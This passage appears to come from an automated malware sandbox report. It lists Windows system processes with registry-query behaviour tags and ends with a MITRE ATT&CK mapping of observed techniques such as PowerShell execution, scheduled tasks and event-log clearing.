C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:1688

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:2668

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:2996

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:4088

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:2784

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4056

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:1380

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Checks BIOS information in registry
- Checks SCSI registry key(s)
- Checks processor information in registry
- Enumerates system info in registry
PID:2764

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Indicator Removal

T1070

Clear Windows Event Logs

T1070.001

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery